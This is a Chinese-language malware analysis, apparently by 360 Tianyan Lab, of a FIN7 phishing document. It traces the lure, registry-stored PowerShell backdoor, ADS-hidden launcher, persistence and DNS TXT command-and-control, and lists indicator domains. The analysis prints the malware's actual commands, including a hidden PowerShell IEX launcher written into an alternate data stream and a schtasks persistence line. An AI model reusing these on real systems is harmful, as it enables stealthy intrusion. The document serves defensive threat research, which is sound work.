信息來源：FreeBuf

事件背景

2017年3月，F(xiàn)ireEye發(fā)布了一篇名黑客組織FIN7的APT攻擊簡報，報告稱FIN7組織以釣魚郵件為攻擊渠道，主要對美國金融機構(gòu)滲透攻擊。組織的攻擊利用DNS協(xié)議的TXT字段進行C&C通信。360威脅情報中心對此APT組織的攻擊鏈條進行了梳理，對木馬相關(guān)的技術(shù)進行了分析，揭示其一些有意思的技巧。

目標樣本

Hash	d04b6410dddee19adec75f597c52e386
文件類型	Word文檔
文件大小	1,834,496字節(jié)

攻擊特點與攻擊流程

FIN7攻擊特點主要體現(xiàn)在：

1. 全部攻擊過程使用非PE實現(xiàn)，釣魚使用doc文件，后門使用powershell文件。

2. 使用ADS數(shù)據(jù)隱藏保存在磁盤中的非PE文件

3. 后門文件保存在注冊表中，功能由Powershell實現(xiàn)

4. 與C&C通信使用DNS協(xié)議的TXT記錄

5. C&C地址從64個硬編碼的地址中隨機選擇

攻擊流程：

在整個攻擊過程中，沒有使用到PE文件，這在一定程度上躲避了安全軟件的查殺。落地的文件也進行了技術(shù)上的隱藏，而真正的后門程序卻已加密的方式存儲在注冊表中。

攻擊者以釣魚郵件為進入渠道，在惡意文檔中嵌入vbs腳本，vbs腳本運行后解密后門程序?qū)懭胱员碇?，同時將調(diào)用后門程序的腳本以ads隱藏在磁盤文件中。在后門運行后，使用DNS TXT做為C&C通信方式。

樣本分析

釣魚郵件打開后，顯示如下圖所示，可以看到，文檔中插入了一張圖片，圖片字體顯示模糊。

 

通過分析，得到了釣魚文檔的制作過程：分別插入了一個vbs的OLE對象與一張字跡模糊的圖片，將OLE對象的圖標設置為透明圖標并置入圖片對象的頂層，最將兩個對象組合到一起，這樣就達到了雙擊圖片，實際上運行了vbs腳本的目的。 

雙擊圖片，就會打開vbs腳本，只有當用戶點擊彈出的對話框中的確定后，才會運行vbs腳本，如果在這時，用戶點擊了取消，就可以阻斷這次攻擊。

為了誘導用戶雙擊圖片運行vbs腳本，文檔中還寫入“This document is protected by Microsoft Office and requires human verification Please Enable Editing and Double Click on page below.”（文檔被Microsoft Office 保護，請啟用編輯并雙擊下面的圖片）。

VBS功能：

當上面的圖片被雙擊運行后，程序后臺會運行VBS腳本，該腳本功能為：調(diào)用powershell解密一大段字符，從代碼中可以看出，解密出來的為一gz文件，因此可以將這大段base64解密后，保存成gz格式，使用解壓工具得到壓縮文件繼續(xù)分析。

樣本加載感染過程：

gz中的文件也是一個powershell腳本。腳本經(jīng)過混淆，實現(xiàn)的功能是：判斷當前用戶是不是administartor權(quán)限，根據(jù)不同的權(quán)限寫入不同的注冊表內(nèi)容，這些內(nèi)容為開機后會解密執(zhí)行的代碼，隨后通過ADS將加載注冊表內(nèi)容的vbs腳本寫入C:\ProgramData\windows :CtxDnsClient.vbs文件中，并將該文件加入啟動項和計劃任務中。

 原始的powershell內(nèi)容，可以看到powershell腳本經(jīng)過了混淆：

后門程序?qū)懭胱员?/span>

Powershell寫入到注冊表中的后門程序的內(nèi)容如下：

ADS隱藏磁盤文件

將要實現(xiàn)開機啟動的文件寫入到磁盤文件C:\ProgramData\Windows:CtxDnsClient.vbs中。

對于Windows:CtxDnsClient.vbs文件，使用了ADS數(shù)據(jù)隱藏技術(shù)。而通過ADS隱藏的數(shù)據(jù)在Windows系統(tǒng)中無法顯示，文件大小也顯示為0字節(jié)：

 

但是使用dir /r命令，可以看到ADS中有隱藏的數(shù)據(jù)

 

啟動項中的隱藏的ads數(shù)據(jù)，dump出來后顯示如下：

 

使用 ADS中隱藏數(shù)據(jù)內(nèi)容為：

cmd /c "echo Set objShell = CreateObject(""Wscript.shell"") > C:\ProgramData\Windows:CtxDnsClient.vbs" 

cmd /c "echo objShell.run ""powershell -WindowStyle Hidden -executionpolicy bypass 

-C IEX ((Get-ItemProperty -Path HKCU:Software\Microsoft\Windows).Part)"",0 >> C:\ProgramData\Windows:CtxDnsClient.vbs"

添加開機啟動

創(chuàng)建的啟動項，啟動項位置為HKCU\Software\Microsoft\Windows\CurrentVersion\Run\：

添加計劃任務：

schtasks.exe /F /create /tn CtxDnsClient /tr 

"C:\Windows\System32\wscript.exe C:\ProgramData\Windows:CtxDnsClient.vbs " /sc onidle /i 30

通過上面這些過程，來實現(xiàn)程序的自啟動。在系統(tǒng)重新啟動后，啟動項中的wscript.exe會加載Windows:CtxDnsClient.vbs，Windows:CtxDnsClient.vbs中會使用powershell加載HKCU\Software\Microsoft\Windows \Part內(nèi)容，part中實現(xiàn)的功能會加載注冊表相同位置下的CtxDnsClient的內(nèi)容。這里的內(nèi)容就是真正的實現(xiàn)CC的功能。

C&C通信功能

這部分功能主要在注冊表中的HKCU\Software\Microsoft\Windows下 CtxDnsClient的內(nèi)容中，主要功能為：從內(nèi)置的64個域名中隨機選擇一個，查詢該域名的SPF記錄，用來實現(xiàn)自己的C&C通信。

創(chuàng)建名為”SourceFireSux”的互斥體，防止程序重復運行：

編碼過的64個域名地址代碼片段：

 

 

從這64個域名中，隨機選取一個（如這里隨機被選擇到的為：pbbk.us），加上www前綴，查詢對應DNS TXT記錄內(nèi)容（即查詢www.pbbk.us的dns txt記錄）。

如果返回的內(nèi)容為idle，則程序睡眠3.5秒到5.4秒的隨機時間。

如果返回的內(nèi)容為www，則表明這個域名現(xiàn)在正在攻擊者控制之中，隨后查詢mail.pbbk.us的dns txt記錄。

隨后mail.pbbk.us返回的內(nèi)容就被 powershell直接通過IEX調(diào)用執(zhí)行。

IOC

木馬嘗試通信的C&C地址：

域名	注冊人	注冊時間	備注
www.grij.us	Frank Walters	2017/2/19 3:09
www.kwoe.us	Frank Walters	2017/2/19 3:09
www.zugh.us	Frank Walters	2017/2/19 3:09
www.pafk.us	Frank Walters	2017/2/19 3:09
www.cuuo.us	Frank Walters	2017/2/19 3:07
www.ooyh.us	Frank Walters	2017/2/19 3:07
www.vxqt.us	Frank Walters	2017/2/19 3:06
www.cgqy.us	Frank Walters	2017/2/19 3:07
www.wfsv.us	Frank Walters	2017/2/19 3:07
www.palj.us	Frank Walters	2017/2/19 3:09
www.idjb.us	Frank Walters	2017/2/19 3:09
www.zjav.us	Frank Walters	2017/2/19 3:09
www.mewt.us	Frank Walters	2017/2/19 3:06
www.vkpo.us	Frank Walters	2017/2/19 3:07
www.wqiy.info	WhoisGuard Protected	2017/2/18 19:08
www.wvzu.pw	WhoisGuard Protected	2017/2/18 0:00
www.gxhp.top	WhoisGuard Protected	2017/2/18 19:07
www.hvzr.info	WhoisGuard Protected	2017/2/18 19:07
www.reld.info	WhoisGuard Protected	2017/2/18 0:00
www.vqba.info	WhoisGuard Protected	2017/2/18 19:06
www.oxrp.info	WhoisGuard Protected	2017/2/18 19:08
www.dvso.pw	WhoisGuard Protected	2017/2/18 0:00
www.bvyv.club
www.bwuk.club
www.cihr.site
www.coec.club
www.oyaw.club
www.pbbk.us
www.ppdx.pw
www.pvze.club
www.qefg.info
www.qlpa.club
www.ueox.club
www.ufyb.club
www.dbxa.pw
www.eady.club
www.enuv.club
www.eter.pw
www.utca.site
www.vdfe.site
www.vjro.club
www.fbjz.pw
www.fhyi.club
www.futh.pw
www.gnoa.pw
www.vwcq.us
www.jimw.club
www.jomp.site
www.jxhv.site
www.kshv.site
www.ysxy.pw
www.zmyo.club
www.zody.pw
www.lhlv.club
www.lnoy.site
www.lvrm.pw
www.mfka.pw
www.nxpu.site
www.oaax.site
www.odyr.us
www.oknz.club
www.ooep.pw
www.ckwl.pw	Lin Shi Mo Ban	2015/11/11 0:00	不能作為IOC
www.zcnt.pw	Lin Shi Mo Ban	2015/11/16 0:00	不能作為IOC

參考鏈接

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

*本文作者：360天眼實驗室，轉(zhuǎn)載請注明來自FreeBuf.COM